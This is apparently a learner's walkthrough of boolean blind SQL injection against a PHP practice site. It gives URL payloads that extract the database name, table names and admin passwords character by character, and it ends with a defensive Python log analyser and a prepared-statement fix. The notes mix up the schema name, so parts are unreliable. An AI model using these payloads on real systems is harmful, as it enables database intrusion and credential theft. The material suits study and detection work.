Blind injection: first we need to understand the blind injection syntax.
There is a syntax description here:
https://blog.csdn.net/alex_seo/article/details/82148955
0X01 First step: determine the length of the current database name
Syntax:
/index.php?id=1%20and%20length((select%20database()))%3E3 correct
index.php?id=1 and length((select database()))>4 wrong
The length is greater than 3 but not greater than 4, so the database name is 4 characters long.
0X02 Enumerate the database name
http://www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E1 correct
?id=1 and ascii(substr((select database()),1,1))>100 correct
?id=1 and ascii(substr((select database()),1,1))>115 correct
?id=1 and ascii(substr((select database()),1,1))>116 wrong
So the first character of the database name has ASCII code 116 => t
Continue with the second character
?id=1 and ascii(substr((select database()),2,1))>100 correct
?id=1 and ascii(substr((select database()),2,1))>101 wrong
So the second letter is 101 => e
Continue with the third
?id=1 and ascii(substr((select database()),3,1))>114 correct
?id=1 and ascii(substr((select database()),3,1))>115 wrong
The third letter is 115 => s
The fourth
?id=1 and ascii(substr((select database()),4,1))>115 correct
?id=1 and ascii(substr((select database()),4,1))>116 wrong
The fourth is 116 => t
So the database name should be test
0X02 Enumerate table names
First determine how many tables there are
I don't know the syntax for this
Then the length of the first table name
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>4
Here you can see this is correct
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 wrong
So the length of the first table name is 4
Enumerate the first letter of the first table name
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1 correct
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 correct
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 wrong
So we know the first letter of the table name is 101 => e
Enumerating the second letter
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108 correct
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 wrong
So the second letter is 109 => m
Getting this far, this is more or less email
We start enumerating the second table
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>100 correct
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 wrong
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 correct
The first letter is 114 => r
Not admin, don't want it
Third table
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>116 correct
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 wrong
The first letter is 117 => u
This is certainly the users table, no need to say more; blind injection is too tiring, so go straight to enumerating column names
FML, the database name I meant to write was security; test was wrong, badly wrong
0X03 Enumerate column names
The operation is the same as for enumerating table names
Here we enumerate username and password
0X04 Enumerate fields
password
ascii(substr((select password from admin limit 0,1),1,1))>1
Let's check the contents of the password column inside our admin table
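As an added defender's-side example (not from the original post): the boolean probes used throughout this walkthrough leave a distinctive trail in the web server access log, a long run of near-identical requests that differ only in the number being compared. The Python below URL-decodes access-log requests, flags the probe shapes seen above (length()/ascii(substr()) wrapped around a subquery, reads of information_schema) and summarizes them per client IP; the log lines, IPs and timestamps are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format, abbreviated); the URLs mirror the probes in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:10:00:01 +0000] "GET /index.php?id=1%20and%20length((select%20database()))%3E3 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:02 +0000] "GET /index.php?id=1%20and%20length((select%20database()))%3E4 HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2023:10:00:03 +0000] "GET /index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E100 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:04 +0000] "GET /index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E115 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:10:00:05 +0000] "GET /index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E116 HTTP/1.1" 200 498
10.0.0.9 - - [10/Oct/2023:10:00:06 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512
"""

# client IP and request path of a combined-format log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

# Shapes of the boolean probes used in the post: a comparison on length()/ascii(substr())
# wrapped around a subquery, or a direct read of information_schema.
BLIND_PATTERNS = [
    re.compile(r"\b(and|or)\s+(length|char_length|ascii|ord)\s*\(.*\bselect\b"),
    re.compile(r"\bsubstr(ing)?\s*\(.*\bselect\b.*\)\s*[<>=]"),
    re.compile(r"\binformation_schema\.(tables|columns)\b"),
]

def normalize(url):
    """URL-decode, lowercase and collapse whitespace so encoded probes match the patterns."""
    return re.sub(r"\s+", " ", unquote_plus(url)).lower()

def is_blind_probe(url):
    text = normalize(url)
    return any(p.search(text) for p in BLIND_PATTERNS)

def analyze(log_text):
    """Per client IP: number of blind probes and number of distinct query templates
    (the probe with every number masked). Many probes over one or two templates is the
    signature of character-by-character extraction, as opposed to a one-off scanner hit."""
    hits = defaultdict(lambda: {"probes": 0, "templates": set()})
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not is_blind_probe(m.group(2)):
            continue
        ip, url = m.group(1), normalize(m.group(2))
        hits[ip]["probes"] += 1
        hits[ip]["templates"].add(re.sub(r"\d+", "N", url))
    return {ip: {"probes": h["probes"], "templates": len(h["templates"])} for ip, h in hits.items()}

if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The real fix on the application side is a prepared statement for the id parameter; this script is for spotting the probing in logs of a site that has not yet been fixed.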